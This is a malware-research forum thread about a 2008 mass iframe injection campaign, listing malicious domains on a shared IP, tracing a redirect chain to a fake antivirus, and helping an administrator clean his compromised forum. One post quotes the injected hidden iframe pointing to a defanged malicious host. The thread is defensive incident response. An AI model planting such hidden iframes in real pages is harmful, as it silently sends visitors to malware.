cry217/xd.php - wpa.qq.com mass injection

[CM_MWR]

.........

[sowhat-x]

First result in Google for "cry217/xd.php"...

hxxp://www.dir4you.org/cry217/xd.php

Few more digging that CM_MWR did for this dir4you.org...

www.rxpharmacyonline.org  A  193.111.244.21
www.dir4you.org  A  193.111.244.21
hipointltd.com  A  193.111.244.21
www.superadultsearch.com  A  193.111.244.21
freexxxmovies.in  A  193.111.244.21
www.freexxxmovies.in  A  193.111.244.21
xxxmovies.dip.jp  A  193.111.244.21
www.rxpharmacyonline.net  A  193.111.244.21
www.kandidatov.net  A  193.111.244.21
adult.fake.hu  A  193.111.244.21
mp3.sh.nu  A  193.111.244.21
porno.sh.nu  A  193.111.244.21
ibm.telenet.lv  A  193.111.244.21
21.244.111.193.in-addr.arpa  PTR  ibm.telenet.lv
www.freesexonline.biz  A  193.111.244.21

...and it seems they've started way much earlier...
Here's a nice thread over at Castlecops,back from middle April:
http://www.castlecops.com/p1077867-iframe_attack_several_exploits.html

[sbysky]

Hi, I find this post from Google search. I'm the administrator of the site http://www.sbysky.com/bbs
Could you tell me how to clear this virus? I'll appreciate your help very much!

[sowhat-x]

Hi sbysky,
at least from what I see,since there has been some time since,your forum is...NOT infected... 
And neither we have (or ever had it) listed in the main page's malware hosts database,lol...

It's quite possible that the cry217 malware script above (hosted in "postcardss.phpnet.us" domain),
after infecting it's visitors,it then redirected them to random pages in your forum,
in an attempt to obscure/confuse end-users about what had already taken place "behind" the scenes...
I'll remove completely the reference to your forum from CM_MWR 's logs above though,
so that people don't get the wrong impression... 

[sbysky]

Thank you for your reply. However, in this morning, when I visit the forum, there is an alarm from Karpersky Anti-virus, said:

"Trojan-Downloader.JS.Agent.axm URL:

hxxp://www.dir4you.org/6/testasd///www.dir4you"

I searched for the keyword "dir4you" in the directories and MySql database, but found no result.

The alarm don't appear at each time when you open the forum, but in some cases it does happens.

whether the code has been encoded and encrypted to someone else?

[sowhat-x]

hxxp://www.dir4you.org/6/testasd///www.dir4you -> directs to...
hxxp://www.kandidatov.net/search.php?q=www&saff=4 -> which eventually leads to...
hxxp://bestsexworld.info/soft.php?aid=0073&d=3&product=XPA

bestsexworld.info was accosiated with the recent spreading of the rogue/fake "XPAntivirus 2008":
i say 'was',because at the moment bestsexworld.info doesn't seem to be up and running...
You can read more about it here as well:
http://msmvps.com/blogs/spywaresucks/archive/2008/03/07/1535753.aspx
========================================

You say that the alarm doesn't appear everytime you visit the forum,
which can mean quite a lot of different things...and complicates stuff a bit. 
You should actually manually step through your html/php code,
preferably at the pages where Kaspersky did indeed poped-up the alarm...
An example 'infected' page is here:

hxxp://www.sbysky.com/bbs/index.php?showtopic=4

If you check the html source,you'll find there...

<iframe src="hxxp://www.rxpharmacyonline.net/1/js_go_f1.php"style="display:none"></iframe>

href=hxxp://wpa.qq.com/msgrd?V=1&Uin=5774044&Site=

Maybe there's more...that was a really quick look indeed,
and yes,it's the malware lamers already mentioned above...

Problem is,that it's not necessary that all of the infected pages,
will redirect specifically to rxpharmacyonline,dir4you or wpa.qq...
and this makes the whole cleaning process somewhat troublesome.
Something really important...(unless you've "faked" the information displayed),
you seem to be running a really old IPB version there...that's really asking for serious trouble:
i would certainly consider upgrading,or alternatively,switching to secure freeware alternative.
Even if you step through all the html pages...find all of the injected malware iframes etc.,
since 'hackers' make use of automated scanners in order to find older vulnerable forum installations,
it's more than likely that in the next mass injection,your forum will become a victim once again...

The php gurus around seem to have a somewhat different timezone...
but during the day/by the time they see the posts here,
I'm sure they'll assist you in checking in more detail and cleaning up your forum...

[sbysky]

Thank you very much! I have found it and deleted.
In the MySQL database, there is a table to configure the forum skin property. The virus code has been written into its end.
I will upgrade my forum to a newer one.
Good luck for everyone!

[sowhat-x]

Glad that we've been of some help in cleaning up the forum from the nasties